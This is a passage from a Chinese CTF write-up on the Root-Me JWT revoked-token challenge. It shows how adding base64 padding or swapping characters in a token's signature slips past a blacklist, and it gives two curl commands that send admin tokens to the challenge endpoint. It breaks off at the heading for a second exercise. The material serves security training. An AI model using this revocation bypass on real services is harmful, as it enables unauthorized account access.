<p>让我们查看一下源代码:</p> <blockquote> <em>access_token = create_access_token(identity=username,expires_delta=datetime.timedelta(minutes=3))</em> <em>ret = {</em> <em>'access_token': access_token,</em> <em>}</em> <em>with lock:</em> <em>blacklist.add(access_token)</em> </blockquote> <p>令牌的生命周期为 3 分钟。不管我有多快,提交的toekn请求都是被撤销,令牌一被创建就会被列入黑名单。</p> <p>所以我们需要一个有效的令牌,但不是被列入黑名单。甚至令牌本身也没有列入被黑名单,而jwt的值是 BASE64 表示。</p> <p>根据BASE64 的特性:在某些情况下,BASE64 字符串的末尾可能有一个或两个“=”符号,它们的值是相等的。</p> <p>尝试在令牌中末尾添加=,请求JWT认证,可获得flag</p> <p>curl -H "Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE2NjI3OTYxNTksIm5iZiI6MTY2Mjc5NjE1OSwianRpIjoiYmFhMGRhMWItNjM0NS00ZWIwLTgzMmUtODZhMzcwYzMxYWUxIiwiZXhwIjoxNjYyNzk2MzM5LCJpZGVudGl0eSI6ImFkbWluIiwiZnJlc2giOmZhbHNlLCJ0eXBlIjoiYWNjZXNzIn0.GH7_2m1UQX57wQ6qI5eFonPdjdsUYD87FAGnM575lsg=" http://challenge01.root-me.org/web-serveur/ch63/admin</p> <div style="text-align:center;"> <img alt="" src="https://i-blog.csdnimg.cn/blog_migrate/1c39e397bc0f1eec32f775d21f.png" /> </div> <p>尝试在将token中的下划线_,替换成/,请求JWT认证,也可获得flag</p> <p>curl -H "Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE2NjI3OTc5NTgsIm5iZiI6MTY2Mjc5Nzk1OCwianRpIjoiMTcwMmJhYzAtMzEwMi00NjAyLTk2YjgtNzU1ODlmMjRjZDg5IiwiZXhwIjoxNjYyNzk4MTM4LCJpZGVudGl0eSI6ImFkbWluIiwiZnJlc2giOmZhbHNlLCJ0eXBlIjoiYWNjZXNzIn0.Ln8xsAmrgWVJvxUlLRBZHNILvnYfUN7cXMTf6vk6L/Y" http://challenge01.root-me.org/web-serveur/ch63/admin</p> <div style="text-align:center;"> <img alt="" src="https://i-blog.csdnimg.cn/blog_migrate/4a7cf7a0cc4daa1c2ce4e9fc1.png" /> </div> <h4 style="background-color:transparent;"><strong>0x04 </strong>CTF练习二:ctfhub- jwt</h4> 讯享网
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容,请联系我们,一经查实,本站将立刻删除。
如需转载请保留出处:https://51itzy.com/kjqy/206357.html